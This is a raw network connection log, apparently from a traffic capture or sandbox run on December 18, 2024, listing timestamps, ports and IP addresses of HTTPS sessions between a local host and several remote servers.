Dec 18, 2024 21:08:41.620804071 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:41.621052027 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:41.672198057 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:41.672219992 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:41.672590017 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:41.673602104 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:41.676388979 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:41.719333887 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:42.189126015 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:42.189158916 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:42.189199924 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:42.189220905 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:42.189228058 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:42.189244032 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:42.189295053 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:42.191518068 CET	49709	443	192.168.2.9	149.154.167.99
Dec 18, 2024 21:08:42.191545010 CET	443	49709	149.154.167.99	192.168.2.9
Dec 18, 2024 21:08:42.513317108 CET	49710	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:42.513379097 CET	443	49710	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:42.513467073 CET	49710	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:42.513797998 CET	49710	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:42.513825893 CET	443	49710	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:44.341994047 CET	443	49710	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:44.342101097 CET	49710	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:44.346290112 CET	49710	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:44.346323967 CET	443	49710	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:44.346749067 CET	443	49710	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:44.346816063 CET	49710	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:44.347333908 CET	49710	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:44.391341925 CET	443	49710	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:45.029489040 CET	443	49710	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:45.029589891 CET	443	49710	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:45.029702902 CET	49710	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:45.032999039 CET	49710	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:45.033039093 CET	443	49710	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:45.035275936 CET	49711	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:45.035382032 CET	443	49711	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:45.035489082 CET	49711	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:45.035681963 CET	49711	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:45.035706997 CET	443	49711	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:46.521722078 CET	443	49711	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:46.521800995 CET	49711	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:46.604334116 CET	49711	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:46.604388952 CET	443	49711	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:46.606045008 CET	49711	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:46.606061935 CET	443	49711	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:47.435127020 CET	443	49711	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:47.435204029 CET	443	49711	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:47.435245991 CET	49711	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:47.435282946 CET	49711	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:47.435601950 CET	49711	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:47.435641050 CET	443	49711	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:47.436950922 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:47.436995983 CET	443	49712	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:47.437068939 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:47.437292099 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:47.437304974 CET	443	49712	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:48.836771965 CET	443	49712	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:48.836925030 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:48.837654114 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:48.837661028 CET	443	49712	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:48.842889071 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:48.842897892 CET	443	49712	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:49.757751942 CET	443	49712	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:49.757756948 CET	443	49712	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:49.757824898 CET	443	49712	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:49.757941008 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:49.758169889 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:49.758169889 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:49.759530067 CET	49713	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:49.759566069 CET	443	49713	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:49.759661913 CET	49713	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:49.759898901 CET	49713	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:49.759913921 CET	443	49713	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:50.061866999 CET	49712	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:50.061907053 CET	443	49712	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:51.162313938 CET	443	49713	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:51.162401915 CET	49713	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:51.162849903 CET	49713	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:51.162858963 CET	443	49713	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:51.164505959 CET	49713	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:51.164515018 CET	443	49713	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:52.058851957 CET	443	49713	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:52.058876038 CET	443	49713	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:52.058949947 CET	443	49713	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:52.058964968 CET	49713	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:52.059137106 CET	49713	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:52.060096979 CET	49713	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:52.060113907 CET	443	49713	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:52.062289953 CET	49714	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:52.062347889 CET	443	49714	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:52.062417030 CET	49714	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:52.062618017 CET	49714	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:52.062632084 CET	443	49714	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:53.478296995 CET	443	49714	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:53.478362083 CET	49714	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:53.478790045 CET	49714	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:53.478800058 CET	443	49714	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:53.480489969 CET	49714	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:53.480494976 CET	443	49714	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:54.357856989 CET	443	49714	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:54.357948065 CET	443	49714	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:54.358197927 CET	49714	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:54.358361959 CET	49714	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:54.358382940 CET	443	49714	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:54.376491070 CET	49715	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:54.376543045 CET	443	49715	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:54.376610994 CET	49715	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:54.376802921 CET	49715	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:54.376815081 CET	443	49715	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:55.397130966 CET	49716	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:55.397190094 CET	443	49716	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:55.397253036 CET	49716	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:55.397537947 CET	49716	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:55.397551060 CET	443	49716	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:55.484255075 CET	49706	80	192.168.2.9	199.232.210.172
Dec 18, 2024 21:08:55.604240894 CET	80	49706	199.232.210.172	192.168.2.9
Dec 18, 2024 21:08:55.604315996 CET	49706	80	192.168.2.9	199.232.210.172
Dec 18, 2024 21:08:55.808728933 CET	443	49715	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:55.808962107 CET	49715	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:55.809557915 CET	49715	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:55.809566975 CET	443	49715	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:55.811203003 CET	49715	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:55.811208010 CET	443	49715	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:55.811256886 CET	49715	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:55.811264038 CET	443	49715	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:56.798194885 CET	443	49715	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:56.798388004 CET	443	49715	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:56.798494101 CET	49715	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:56.799561024 CET	49715	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:56.799582958 CET	443	49715	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:56.816765070 CET	443	49716	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:56.819430113 CET	49716	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:56.819921017 CET	49716	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:56.819948912 CET	443	49716	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:56.821491003 CET	49716	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:56.821505070 CET	443	49716	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:57.883539915 CET	443	49716	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:57.883641958 CET	443	49716	94.130.191.168	192.168.2.9
Dec 18, 2024 21:08:57.883657932 CET	49716	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:57.883863926 CET	49716	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:57.908303976 CET	49716	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:08:57.908354998 CET	443	49716	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:01.016525030 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.016577959 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:01.016649008 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.017119884 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.017137051 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:01.394606113 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.394655943 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:01.394879103 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.395096064 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.395107985 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:01.477256060 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.477304935 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:01.477432013 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.477708101 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.477729082 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:01.597228050 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.597282887 CET	443	49726	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:01.597367048 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.597670078 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:01.597681999 CET	443	49726	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:02.745343924 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:02.745604038 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:02.745634079 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:02.750221968 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:02.750300884 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:02.751501083 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:02.751671076 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:02.751682997 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:02.751704931 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:02.798039913 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:02.798074007 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:02.844918966 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.091269970 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.125560045 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.125587940 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.127008915 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.127063990 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.127511978 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.127613068 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.130173922 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.130186081 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.168912888 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.173032999 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.216754913 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.216783047 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.218089104 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.218144894 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.228842020 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.229010105 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.229058027 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.275330067 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.282366037 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.282380104 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.287189007 CET	443	49726	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.329243898 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.329317093 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.395349979 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.395375967 CET	443	49726	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.396672964 CET	443	49726	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.397202015 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.413419008 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.413542986 CET	443	49726	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.454273939 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.454294920 CET	443	49726	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.501128912 CET	49726	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.614984035 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.615693092 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.615961075 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.630546093 CET	49722	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.630594969 CET	443	49722	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.976001978 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.976054907 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.976123095 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.976139069 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.977776051 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.977833033 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.977838993 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.990818977 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.990957022 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.990964890 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.995673895 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:03.995759010 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:03.995768070 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.018593073 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.018702030 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.018714905 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.019587040 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.024252892 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.024298906 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.025419950 CET	49725	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.025435925 CET	443	49725	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.064074993 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.095892906 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.141762018 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.141786098 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.167689085 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.167747974 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.167757988 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.171849012 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.171906948 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.171919107 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.185807943 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.185867071 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.185879946 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.195426941 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.195486069 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.195498943 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.204993963 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.205269098 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.205280066 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.233016968 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.233078957 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.233091116 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.239885092 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.239933968 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.239944935 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.244676113 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.244745970 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.244755983 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.257602930 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.257651091 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.257662058 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.271476030 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.271528959 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.271534920 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.282572031 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.282623053 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.282634020 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.296283960 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.296503067 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.296515942 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.305304050 CET	49731	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:04.305341959 CET	443	49731	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:04.306396008 CET	49731	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:04.310376883 CET	49731	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:04.310391903 CET	443	49731	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:04.338185072 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.339303970 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.360105991 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.360152960 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.360163927 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.365703106 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.365778923 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.365788937 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.387820005 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.387998104 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.388010979 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.400038958 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.400093079 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.400106907 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.406645060 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.406693935 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.406702995 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.409776926 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.409828901 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.409836054 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.421473980 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.421531916 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.421540976 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.422278881 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.422327042 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.422338009 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.432102919 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.432157993 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.432166100 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.444269896 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.444447041 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.444458008 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.459786892 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.459966898 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.459984064 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.466197014 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.466263056 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.466269970 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.476067066 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.476131916 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.476139069 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.484441042 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.484504938 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.484510899 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.493566990 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.493623018 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.493629932 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.502703905 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.502769947 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.502777100 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.517313957 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.517373085 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.517379045 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.520387888 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.520772934 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.520778894 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.529078960 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.529241085 CET	49724	443	192.168.2.9	142.250.181.132
Dec 18, 2024 21:09:04.529247046 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.537837029 CET	443	49724	142.250.181.132	192.168.2.9
Dec 18, 2024 21:09:04.537892103 CET	49724	443	192.168.2.9	142.250.181.132
